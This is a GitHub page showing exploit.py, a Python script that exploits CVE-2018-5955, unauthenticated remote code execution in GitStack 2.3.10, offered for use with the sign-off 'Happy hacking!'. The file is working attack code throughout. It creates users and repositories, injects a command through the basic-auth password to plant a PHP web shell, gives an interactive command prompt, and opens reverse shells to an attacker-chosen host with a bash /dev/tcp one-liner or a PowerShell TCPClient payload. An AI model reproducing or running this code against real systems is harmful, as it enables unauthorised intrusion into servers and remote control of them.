-
Notifications
You must be signed in to change notification settings - Fork 3
/
exploit.py
159 lines (140 loc) · 6.71 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
# Exploit: GitStack 2.3.10 Unauthenticated Remote Code Execution
# Date: 18.01.2018
# Software Link: https://gitstack.com/
# Exploit Author: Kacper Szurek
# Exploit Modified by MikeTheHash
# Date: 23.06.2023
# New features: Interactive RCE, OS Detect, Reverse Shell function
# - Riadapted to python3
# Original Exploit: https://www.exploit-db.com/exploits/43777
# CVE: CVE-2018-5955
# Contact: https://twitter.com/KacperSzurek
# Website: https://security.szurek.pl/
# Category: remote
#
#1. Description
#
#$_SERVER['PHP_AUTH_PW'] is directly passed to exec function.
#
#https://security.szurek.pl/gitstack-2310-unauthenticated-rce.html
#
#2. Proof of Concept
#
import requests
from requests.auth import HTTPBasicAuth
import os
import sys
import colorama
print(colorama.Fore.WHITE + " /\_/\ ")
print(colorama.Fore.WHITE + "/ O O \ ")
# a lil ascii art lol
ip = input(colorama.Fore.YELLOW + "[?] IP of target > " + colorama.Style.RESET_ALL)
repository = 'rce'
username = 'rce'
password = 'rce'
csrf_token = 'token'
user_list = []
print(colorama.Fore.WHITE + "[+] Get user list")
try:
r = requests.get("http://{}/rest/user/".format(ip))
user_list = r.json()
user_list.remove('everyone')
except:
pass
if len(user_list) > 0:
username = user_list[0]
print(colorama.Fore.WHITE + "[+] Found user {}".format(username))
else:
r = requests.post("http://{}/rest/user/".format(ip), data={'username' : username, 'password' : password})
print(colorama.Fore.WHITE + "[+] Create user")
if not "User created" in r.text and not "User already exist" in r.text:
print(colorama.Back.RED + colorama.Fore.WHITE + "[-] Cannot create user")
os._exit(0)
r = requests.get("http://{}/rest/settings/general/webinterface/".format(ip))
if "true" in r.text:
print(colorama.Fore.WHITE + "[+] Web repository already enabled")
else:
print(colorama.Fore.WHITE + "[+] Enable web repository")
r = requests.put("http://{}/rest/settings/general/webinterface/".format(ip), data='{"enabled" : "true"}')
if not "Web interface successfully enabled" in r.text:
print(colorama.Back.RED + colorama.Fore.WHITE + "[-] Cannot enable web interface")
os._exit(0)
print(colorama.Fore.WHITE + "[+] Get repositories list")
r = requests.get("http://{}/rest/repository/".format(ip))
repository_list = r.json()
if len(repository_list) > 0:
repository = repository_list[0]['name']
print(colorama.Fore.WHITE + "[+] Found repository {}".format(repository))
else:
print(colorama.Fore.WHITE + "[+] Create repository")
r = requests.post("http://{}/rest/repository/".format(ip), cookies={'csrftoken' : csrf_token}, data={'name' : repository, 'csrfmiddlewaretoken' : csrf_token})
if not "The repository has been successfully created" in r.text and not "Repository already exist" in r.text:
print(colorama.Back.RED + colorama.Fore.WHITE + "[-] Cannot create repository")
os._exit(0)
print(colorama.Fore.WHITE + "[+] Add user to repository")
r = requests.post("http://{}/rest/repository/{}/user/{}/".format(ip, repository, username))
if not "added to" in r.text and not "has already" in r.text:
print(colorama.Back.RED + colorama.Fore.WHITE + "[-] Cannot add user to repository")
os._exit(0)
print(colorama.Fore.WHITE + "[+] Disable access for anyone")
r = requests.delete("http://{}/rest/repository/{}/user/{}/".format(ip, repository, "everyone"))
if not "everyone removed from rce" in r.text and not "not in list" in r.text:
print(colorama.Back.RED + colorama.Fore.WHITE + "[-] Cannot remove access for anyone")
os._exit(0)
print(colorama.Fore.WHITE + "[+] Create backdoor in PHP")
r = requests.get('http://{}/web/index.php?p={}.git&a=summary'.format(ip, repository), auth=HTTPBasicAuth(username, 'p && echo "<?php system($_POST[\'a\']); ?>" > c:\GitStack\gitphp\exploit.php'))
print("******************************************************************")
output = r.text.encode(sys.stdout.encoding, errors='replace')
print(output.decode())
print("******************************************************************")
# From here (Well, actually i modified also the color of some prints() lol) the script is modified by MikeTheHash
# Happy hacking!
print(colorama.Fore.BLUE + f"[*] Type '{colorama.Fore.WHITE}shell{colorama.Fore.BLUE}' to get a reverse shell")
def execute(commandvar, background=False):
if background == False:
print(colorama.Fore.WHITE + "[+] Execute command" + colorama.Style.RESET_ALL)
r = requests.post("http://{}/web/exploit.php".format(ip), data={'a' : commandvar})
output = r.text.encode(sys.stdout.encoding, errors='replace')
print(output.decode())
elif background == True:
r = requests.post("http://{}/web/exploit.php".format(ip), data={'a' : commandvar})
output = r.text.encode(sys.stdout.encoding, errors='replace')
return output
def checkOS():
if execute("uname", True) == "b'"" \r\n'":
os = "Linux"
else:
os = "Windows"
return os
def shell(os):
if os == "Linux":
print(colorama.Fore.BLUE + "[*] Starting the reverse shell process")
print(colorama.Fore.RED +"[!]" + colorama.Fore.WHITE + " Attention:" + colorama.Fore.BLUE + " YOU NEED TO START NETCAT (nc -nlvp port)")
ipaddr = input(colorama.Fore.YELLOW + "[?] Please enter the IP address for the shell: ")
port = input(colorama.Fore.YELLOW + "[?] Please enter the port number for the shell: " + colorama.Style.RESET_ALL)
execute(f"bash bash -i >& /dev/tcp/{ipaddr}/{port} 0>&1", True)
elif os == "Windows":
ipaddr = input(colorama.Fore.YELLOW + "[?] Please enter the IP address for the shell: ")
port = input(colorama.Fore.YELLOW + "[?] Please enter the port number for the shell: " + colorama.Style.RESET_ALL)
execute("powershell.exe -c \"$client = New-Object System.Net.Sockets.TCPClient('" + ipaddr + "'," + port + ");$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"", True)
else:
print(f"{colorama.Back.WHITE}{colorama.Fore.WHITE}OS Not compatible!{colorama.Style.RESET_ALL}")
print(colorama.Fore.BLUE + "[*] OS : " + colorama.Fore.WHITE + checkOS() + colorama.Style.RESET_ALL)
while(True):
command = input("RCE > ")
if command == "ls" and checkOS() == "Windows":
execute("dir")
elif command == "ifconfig" and checkOS() == "Windows":
execute("ipconfig")
elif command == "ipconfig" and checkOS() == "Linux":
execute("ifconfig")
elif command == "shell":
shell(checkOS())
elif command == "exit":
exit()
elif command == "os":
print(checkOS())
elif command == None or command == "" or command == " ":
pass
else:
execute(command)